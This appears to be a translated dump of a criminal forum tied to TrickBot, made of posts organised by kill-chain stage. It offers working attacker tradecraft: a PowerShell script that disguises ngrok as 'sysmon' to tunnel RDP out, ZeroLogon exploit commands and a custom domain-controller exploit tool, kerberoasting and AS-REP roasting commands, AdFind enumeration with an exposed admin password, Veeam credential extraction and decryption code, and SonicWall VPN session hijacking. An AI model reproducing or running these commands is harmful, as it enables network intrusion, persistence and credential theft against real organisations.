-
Notifications
You must be signed in to change notification settings - Fork 26
/
translated_TrickBot-Forum.txt
5466 lines (3923 loc) · 130 KB
/
translated_TrickBot-Forum.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Kill Chain »
Persistence »
Ngrok
Ngrok
Alter 2 55
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
View Profile Private Message (Offline)
: February 05, 2021, 11:33:04 am
Recorded by
Post
Slice
Administrator
Member
*****
one
View Profile E-mail Private Message (Offline)
Reply #1 : April 28, 2021, 10:10:10 pm
Recorded by
NGROK v2 (only official solution)
register an account through which the connection will go on the site https://dashboard.ngrok.com/signup
immediately request access on the page https://dashboard.ngrok.com/endpoints/status
on the page https://dashboard.ngrok.com/get-started/setup we pick up ngrok.exe (https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip) and api key
install_ngrok.ps1
Code: [Highlight]
function NewNgrok($apikey, $localngrok, $localnssm) {
if (!($apikey)) {throw "NGROK API KEY NEEDED"}
mkdir "C:\Windows\tmp"
if (!($localngrok) -or !(Test-path $localngrok)) {
write-output "download ngrok"
$clnt = new-object System.Net.WebClient
$url = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip"
$file = "C:\Windows\tmp\ngrok.zip"
$clnt.DownloadFile($url,$file)
} else {
$file = $localngrok
}
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
$destination = $shell_app.namespace("C:\Windows\tmp\")
$destination.Copyhere($zip_file.items())
sleep 20
if (!($localnssm) -or !(Test-path $localnssm)) {
write-output "download nssm"
$clnt = new-object System.Net.WebClient
$url = "http://nssm.cc/release/nssm-2.24.zip"
$file = "C:\Windows\tmp\nssm.zip"
$clnt.DownloadFile($url,$file)
} else {
$file = $localnssm
}
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
$destination = $shell_app.namespace("C:\Windows\tmp")
$destination.Copyhere($zip_file.items())
Rename-Item -Path "C:\Windows\tmp\ngrok.exe" -NewName "sysmon.exe"
@"
authtoken: $apikey
tunnels:
default:
proto: tcp
addr: 3389
"@> "C:\Windows\tmp\config.yml"
cd "C:\Windows\tmp\nssm-2.24\win64"
.\nssm.exe install sysmon C:\Windows\tmp\sysmon.exe start --all --region us --config "C:\Windows\tmp\config.yml" --log "false"
Start-Service sysmon
}
powershell import install_ngrok.ps1
psinject 123 x64 NewNgrok "APIKEY" OR if the script fails with downloading from resources, specify local archives
psinject 123 x64 NewNgrok "APIKEY" "C:\path\to\ngrok.zip" "C:\path\to\nssm.zip"
output:
Quote
Directory: C:\Windows
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/28/2021 12:46PM tmp
download ngrok
download nssm
S ervice "sysmon" installedsuccessfully!
« Last Edit: April 29, 2021, 02:26:25 am by Slice »
Pages: 1
Monica Bellucci Fan Club »
Kill Chain »
Persistence »
Ngrok
Go to:
+ Quick response
SMF 2.0.18 | SMF © 2020, Simple Machines
Designed with by SychO
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Kill Chain »
Persistence »
IIS Patch Backdoor
IIS Patch Backdoor
Alter 1 25
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
View Profile Private Message (Offline)
: February 05, 2021, 11:43:38 am
Recorded by
post
Pages: 1
Monica Bellucci Fan Club »
Kill Chain »
Persistence »
IIS Patch Backdoor
Go to:
+ Quick response
SMF 2.0.18 | SMF © 2020, Simple Machines
Designed with by SychO
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Kill Chain »
Privilege Escalation »
Eternal Blue (MS17-010)
Eternal Blue (MS17-010)
Alter 1 37
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
View Profile Private Message (Offline)
: February 05, 2021, 11:48:14 am
Recorded by
Post
Pages: 1
Monica Bellucci Fan Club »
Kill Chain »
Privilege Escalation »
Eternal Blue (MS17-010)
Go to:
+ Quick response
SMF 2.0.18 | SMF © 2020, Simple Machines
Designed with by SychO
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Kill Chain »
Privilege Escalation »
NetLogon (CVE-2020-1472)
NetLogon (CVE-2020-1472)
Alter 3 42
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
View Profile Private Message (Offline)
: February 05, 2021, 11:48:52 am
Recorded by
post
Rozetka
Administrator
Member
*****
35
View Profile E-mail Private Message (Offline)
Reply #1 : Jul 01, 2021, 03:20:14 am
Recorded by
execute-assembly /home/user/soft/scripts/SharpZeroLogon.exe CTT-DC02.cttexas.local
execute-assembly /home/user/soft/scripts/SharpZeroLogon.exe CTT-DC02.cttexas.local -reset
execute-assembly /home/user/soft/scripts/SharpZeroLogon.exe CTT-DC02.cttexas.local -patch
Rozetka
Administrator
Member
*****
35
View Profile E-mail Private Message (Offline)
Reply #2 : Jul 01, 2021, 03:42:54 am
Recorded by
Zero.exe of our development ::
Quote
USAGE: ZERO.EXE IP DC DOMAIN ADMIN_USERNAME [-c] COMMAND [-remote]:
----------------------------------------------------
where:
IP - ip address of domain controller
DC - domain controller name
DOMAIN - domain name, eg home.local
ADMIN_USERNAME - account name of the administrator. can be default <Administrator> or something else
-c - optional, use it when command is not binary executable itself
COMMAND - command that will be executed on domain controller. should be surrounded by quotes
-remote - if target is outside of current subnet
or
ZERO.EXE -test IP DC
to test if the target is vulnerable only
Execution of the code on the DC of the vulnerable ZeroLogon:
zero.exe 192.168.22.5 CCGPDC cccnetwork.com Administrator -c "whoami > C:\ProgramData\loggg5.txt"
192.168.22.5 - ipak MPC
GCCPDC - hostname PDC
cccnetwork.com - domain
Administrator - Any YES
-c > command to be run from the system
Pages: 1
Monica Bellucci Fan Club »
Kill Chain »
Privilege Escalation »
NetLogon (CVE-2020-1472)
Go to:
+ Quick response
SMF 2.0.18 | SMF © 2020, Simple Machines
Designed with by SychO
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Kill Chain »
Privilege Escalation »
Kerberoasting
Kerberoasting
Alter 2 35
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
View Profile Private Message (Offline)
: February 05, 2021, 11:49:06 am
Recorded by
post
Rozetka
Administrator
Member
*****
35
View Profile E-mail Private Message (Offline)
Reply #1 : Jul 01, 2021, 03:25:23 am
Recorded by
From cobalt >
execute-assembly /home/user/txt/edu/Fast-Guide/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
From under the vpna of your car:
----
We carry out a kerberoasting attack through vpn from a non-domain car, having vpn credits
kerberoast remote from non-domain machine with domain user creds:
1. Rubeus.exe kerberoast /dc:wesads15.wes.local /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt /creduser:domain.local\username /credpassword:UserPass!
Asreproast remote from non-domain machine with domain user creds:
2. Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt /dc:dc.domain.local /creduser:domain.local\username /credpassword:UserPass!
as you can see we do the same as in the normal attack, just add 3 new attributes:
/dc: - specify the domain controller
/creduser: - login of the domain user from which we are running
/credpassword: - password of the domain user from which we are running
from @cybercat
Pages: 1
Monica Bellucci Fan Club »
Kill Chain »
Privilege Escalation »
Kerberoasting
Go to:
+ Quick response
SMF 2.0.18 | SMF © 2020, Simple Machines
Designed with by SychO
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Kill Chain »
Privilege Escalation »
Finding available ADMIN$ shares
Finding available ADMIN$ shares
Alter 2 40
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
View Profile Private Message (Offline)
: February 05, 2021, 11:51:33 am
Recorded by
Post
Rozetka
Administrator
Member
*****
35
View Profile E-mail Private Message (Offline)
Reply #1 : Jul 01, 2021, 03:23:51 am
Recorded by
powershell-import /home/user/soft/ShareFinder.ps1
psinject 5209 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shares5.txt
5209 x86 - your current process.
Palit eset if I'm not mistaken
Code: [Highlight]
https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1
Pages: 1
Monica Bellucci Fan Club »
Kill Chain »
Privilege Escalation »
Finding available ADMIN$ shares
Go to:
+ Quick response
SMF 2.0.18 | SMF © 2020, Simple Machines
Designed with by SychO
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Kill Chain »
Initial Access »
AdFind Guide
AdFind Guide
Alter 3 60
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
View Profile Private Message (Offline)
: February 05, 2021, 11:52:02 am
Recorded by
Post
Rozetka
Administrator
Member
*****
35
View Profile E-mail Private Message (Offline)
Answer #1 : March 15, 2021, 01:55:04 am
Recorded by
Code: [Highlight]
adfind.exe -h 10.50.50.4 -b dc=optech,dc=local -u optech.local\administrator -up 9088JodyLynn7 -f "(objectcategory=person)" > ad_users.txt
adfind.exe -h 10.50.50.4 -b dc=optech,dc=local -u optech.local\administrator -up 9088JodyLynn7 -f "objectcategory=computer" > ad_computers.txt
adfind.exe -h 10.50.50.4 -b dc=optech,dc=local -u optech.local\administrator -up 9088JodyLynn7 -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -h 10.50.50.4 -b dc=optech,dc=local -u optech.local\administrator -up 9088JodyLynn7 -sc trustdmp > trustdmp.txt
adfind.exe -h 10.50.50.4 -b dc=optech,dc=local -u optech.local\administrator -up 9088JodyLynn7 -subnets -f (objectCategory=subnet) > subnets.txt
adfind.exe -h 10.50.50.4 -b dc=optech,dc=local -u optech.local\administrator -up 9088JodyLynn7 -f "(objectcategory=group)" > ad_group.txt
adfind.exe -h 10.50.50.4 -b dc=optech,dc=local -u optech.local\administrator -up 9088JodyLynn7 -gcb -sc trustdmp > trustdmp.txt
adfind polling with LOGIN PASS DOMAIN WITHOU CONTEXT FROM NETWORK/VPN
« Last Edit: March 15, 2021, 01:57:22 am by Rozetka »
giovanni
Users
Member
*
2
View Profile E-mail Private Message (Offline)
Reply #2 on June 11, 2021, 08:36:52 am
Recorded by
You can remove this:
Code: [Highlight]
adfind.exe -h 10.50.50.4 -b dc=optech,dc=local -u optech.local\administrator -up 9088JodyLynn7 -sc trustdmp > trustdmp.txt
The last command overwrites anyway.
Pages: 1
Monica Bellucci Fan Club »
Kill Chain »
Initial Access »
AdFind Guide
Go to:
+ Quick response
SMF 2.0.18 | SMF © 2020, Simple Machines
Designed with by SychO
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Kill Chain »
Privilege Escalation »
GPP Passwords
GPP Passwords
Alter 1 29
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
Profile View Private Message (Offline)
: February 05, 2021, 11:53:30 am
Recorded by
post
Pages: 1
Monica Bellucci Fan Club »
Kill Chain »
Privilege Escalation »
GPP Passwords
Go to:
+ Quick response
SMF 2.0.18 | SMF © 2020, Simple Machines
Designed with by SychO
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Software and Technologies »
Backup Solutions »
Decrypting Veeam passwords
Decrypting Veeam passwords
Alter 2 61
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
View Profile Private Message (Offline)
: February 05, 2021, 01:25:02 pm
Recorded by
post
Rozetka
Administrator
Member
*****
35
View Profile E-mail Private Message (Offline)
Reply #1 : February 11, 2021, 02:41:29 pm
Recorded by
edited by rz >
tasklist /v (look for sqlservr and PID in netstat.ano, look for port in netstat by PID)
netstat -ano
Looking for MsSQL port by PID in 2 outputs
looking for where is sqlcmd.exe
Quote
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,port found -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password], [usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
option -y0 required otherwise sqlcmd cuts output
then take this code
Quote
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;
namespace Main
{
internal static class Program
{
private static void Decrypt(string b,string a){
if (string.IsNullOrEmpty(a))
{
return;
}
byte[] encryptedData = Convert.FromBase64String(a);
Console.WriteLine(b+':'+Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine)));
return;
}
private static void Main(string[] args)
{
Decrypt("optional username","hash from sqlcmd output here");
}
}
}
for each hash, a separate call to the Decrypt function
Create a file
c:\Windows\Microsoft.NET\Framework\v4.0.30319\veeam1.cs
The code that you put above in veeam1.cs
Open cmd
You go to hell
Quote
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
Next, build the EXE like this:
Quote
c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe veeam1.cs
You will run on a machine with Wiam FROM UNDER CMD (it spits out the password in cmd)
Quote
c:\Windows\Microsoft.NET\Framework\v4.0.30319\veeam1.exe
The output is a password
All credits xuz
fixed by rz
Pages: 1
Monica Bellucci Fan Club »
Software and Technologies »
Backup Solutions »
Decrypting Veeam passwords
Go to:
+ Quick response
SMF 2.0.18 | SMF © 2020, Simple Machines
Designed with by SychO
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Frameworks »
Other Tools »
Search for externally accessible subdomains (subdrill.sh)
Search for externally accessible subdomains (subdrill.sh)
Alter 1 31
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
View Profile Private Message (Offline)
: February 11, 2021, 02:02:59 am
Recorded by
A very [very] simple and pipe-able script for finding subdomains based on [free] online services without any dependency to API-keys for penetration testers and bug bounty hunters.
usage:
chmod +x Sub-Drill.sh
./Sub-Drill.sh [Domain.Com] [optional-output-file]
Used services:
threatcrowd
hackertarget
crt.sh
certspotter
spyse.com
bufferover.run [tls,dns]
urlscan.io
synapsint.com
jldc.me (anubis)
omnisint.io (SonarSearch)
alienvault [otx]
riddler.io
suip.biz [Amass,Subfinder]
rapiddns.io
web.archive.org
Code: [Highlight]
curl --silent https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=$1 | grep -o -E "[a-zA-Z0-9._-]+\.$1" > tmp.txt
curl --silent https://api.hackertarget.com/hostsearch/?q=$1 | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent https://crt.sh/?q=%.$1 | grep -oP "\<TD\>\K.*\.$1" | sed -e 's/\<BR\>/\n/g' | grep -oP "\K.*\.$1" | sed -e 's/[\<|\>]//g' | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent https://crt.sh/?q=%.%.$1 | grep -oP "\<TD\>\K.*\.$1" | sed -e 's/\<BR\>/\n/g' | sed -e 's/[\<|\>]//g' | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent https://crt.sh/?q=%.%.%.$1 | grep "$1" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v " " | grep -o -E "[a-zA-Z0-9._-]+\.$1" | sort -u >> tmp.txt
curl --silent https://crt.sh/?q=%.%.%.%.$1 | grep "$1" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v " " | grep -o -E "[a-zA-Z0-9._-]+\.$1" | sort -u >> tmp.txt
curl --silent https://certspotter.com/api/v0/certs?domain=$1 | grep -o '\[\".*\"\]' | sed -e 's/\[//g' | sed -e 's/\"//g' | sed -e 's/\]//g' | sed -e 's/\,/\n/g' | grep -o -E "[a- zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent https://spyse.com/target/domain/$1 | grep -E -o "button.*>.*\.$1\/button>" | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent https://tls.bufferover.run/dns?q=$1 | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent https://dns.bufferover.run/dns?q=.$1 | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent https://urlscan.io/api/v1/search/?q=$1 | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent -X POST https://synapsint.com/report.php -d "name=http%3A%2F%2F$1" | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent https://jldc.me/anubis/subdomains/$1 | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([Az]))\w+" >> tmp .txt
curl --silent https://sonar.omnisint.io/subdomains/$1 | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent https://otx.alienvault.com/api/v1/indicators/domain/$1/passive_dns | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
curl --silent https://riddler.io/search/exportcsv?q=pld:$1 | grep -o -E "[a-zA-Z0-9._-]+\.$1" >> tmp.txt
if [[ $# -eq 2 ]]; then
cat tmp.txt | sed -e "s/\*\.$1//g" | sed -e "s/^\..*//g" | grep -o -E "[a-zA-Z0-9._-]+\.$1" | sort -u > $2
else
cat tmp.txt | sed -e "s/\*\.$1//g" | sed -e "s/^\..*//g" | grep -o -E "[a-zA-Z0-9._-]+\.$1" | sort-u
fi
rm -f tmp.txt
Pages: 1
Monica Bellucci Fan Club »
Frameworks »
Other Tools »
Search for externally accessible subdomains (subdrill.sh)
Go to:
+ Quick response
SMF 2.0.18 | SMF © 2020, Simple Machines
Designed with by SychO
================================================= ==============================
vampire
New themes
New answers
Start
Help
Search
Profile
Private messages
Users
Monica Bellucci Fan Club
Monica Bellucci Fan Club »
Kill Chain »
Initial Access »
SonicWall SSL-VPN
SonicWall SSL-VPN
Alter 2 81
« previous topic next topic »
Pages: 1
alter
Administrator
Member
*****
28
View Profile Private Message (Offline)
: February 05, 2021, 10:37:40 am
Recorded by
for those who need to work with SonicWall through browser sessions
Using a Web Browser to Access
- take the session from the script output, for example "47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg="
- open the browser in incognito mode, open the developer console (js-console)
- encode the session ID in base64
>> btoa("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
- drive in the URL https://target (redirect to https://target/cgi-bin/welcome)
- go to the console in application/cookies, add a cookie
swap : NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=
- in the browser (where .../cgi-bin/welcome) edit the URL to https://target/cgi-bin/portal
- get access to the resource under the user session
« Last Edit: February 11, 2021, 02:11:01 am by Alter »
Rozetka
Administrator
Member
*****
35
View Profile E-mail Private Message (Offline)
Reply #1 : February 22, 2021, 10:28:27 pm